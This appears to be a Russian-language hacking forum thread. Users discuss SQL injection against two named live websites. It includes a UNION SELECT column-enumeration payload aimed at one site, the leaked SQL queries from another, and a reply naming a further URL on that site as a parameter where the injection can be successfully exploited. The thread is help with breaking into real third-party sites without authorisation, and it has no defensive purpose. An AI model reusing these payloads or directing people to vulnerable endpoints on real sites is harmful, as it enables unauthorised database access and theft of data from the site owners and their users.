Сообщение от
killrok6
Нашел на одном сайте уязвимость, но при вставлении ковычки он выводит код на белом фоне :
т.е SELECT * FROM subgrp WHERE sts = 1 and grp = 5\'
На сайте: http://autolv.com/index.php?grp_id=3'
Что делать?
Логично же - не вставлять кавычку
И в этом конкретном примере вывод получить не удастся из-за двух запросов, выполняющихся подряд:
Код:
SELECT * FROM grp_des WHERE type = 'mgr' and grp_id =6 and lang='lang2'
Код:
SELECT * FROM subgrp WHERE sts = 1 and grp = 6
Успешно можно раскрутить скулю вот тут, например:
Код:
http://autolv.com/index.php?item_id=52
Сообщение от
killrok6
И вот недавно наткнулся на одном сайте было что подобрал поля, но не где не выводиться инфа
http://asg.lv/index.php?mlng=5&mmen_id=4+union+select+1,2,3,4,5, 6,7,8,9,10,11
Почему?
Я думаю оно работает так:
Представим 2 запроса.
Причем один из них фильтруется, а второй нет.
В оба запроса передается один и тот же параметр
Результаты первого запроса выводятся на экран, а второго - нет.
Поэтому мы можем подобрать количество полей.
Но вывод получить не удастся.
Хотя есть некая странность, и
работает, при условии, что
работать отказывается. Этого я объяснить не могу(